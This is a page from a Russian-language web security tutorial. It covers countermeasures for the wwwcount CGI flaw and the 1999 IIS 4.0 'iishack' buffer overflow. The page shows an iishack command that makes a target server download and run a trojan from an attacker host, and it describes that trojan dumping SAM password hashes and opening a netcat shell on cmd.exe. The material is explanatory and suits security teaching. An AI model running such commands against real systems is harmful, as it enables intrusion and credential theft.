Иллюстрированный самоучитель по Secure Web




Переполнение буфера - часть 2


Контрмеры против использования nsbflHawwwcount

Предотвратить использование изъяна программы wwwcount можно двумя способами: 

  •  Удалите сценарий wwwcount. cgi.
  •  Отмените для сценария право на выполнение с помощью команды chmod -x wwwcount.cgi.
  • Изъян iishack сервера IIS 4.0

    В июне 1999 года широкой общественности стало известно о досадной ошибке в системе защиты сервера IIS 4.0, которая оказалась серьезной угрозой безопасности Web-сервера компании Microsoft. Этот изъян был обнаружен группой экспертов по вопросам безопасности еЕуе, которая поместила в Internet исходный код и исполняемый файл, с помощью которого можно осуществить взлом. Источником проблемы является недостаточная проверка границ имен файлов .НТК, .STM и .юс, содержащихся в адресах URL. Это позволяет взломщику поместить в этот адрес код, который будет загружен на целевую систему и выполнен с правами администратора.

    Программа, демонстрирующая использование данного изъяна, называется iishack, а найти ее можно по адресу http://www.technotronic.com (а также И на других Web-узлах). При этом достаточно указать адрес URL и имя файла типа "троянский конь", который нужно запустить:

    C:\nt\>iishack 10.12.24.2 80 172.29.11.101/getem.exe

    ---(US 4.0 remote buffer overflow exploit)— — —

    (c) dark spyrit — barns@eeye.com. http://www.eEye.com

    [usage: iishack <host> <port> <url>]

    eg - iishack www.example.com 80 www.myserver.com/thetrojan.exe

    do not include 'http://1 before hosts!

    Data sent!

    Созданная авторами простая программа типа "троянский конь" getem.exe, распаковывает утилиту pwdump.exe (позволяющую получить дамп хеш-кодов базы данных SAM), запускает утилиту netcat, настроенную на прослушивание порта 25, и возвращает обратно командную оболочку (nc -nw -L -р 25 -t -e cmd.exe). После успешного выполнения всех этих действий на собственном компьютере можно запустить утилиту netcat, получив таким образом в свое распоряжение командную оболочку и локальный доступ с привилегиями учетной записи SYSTEM (т.е. с правами администратора):



    Содержание  Назад  Вперед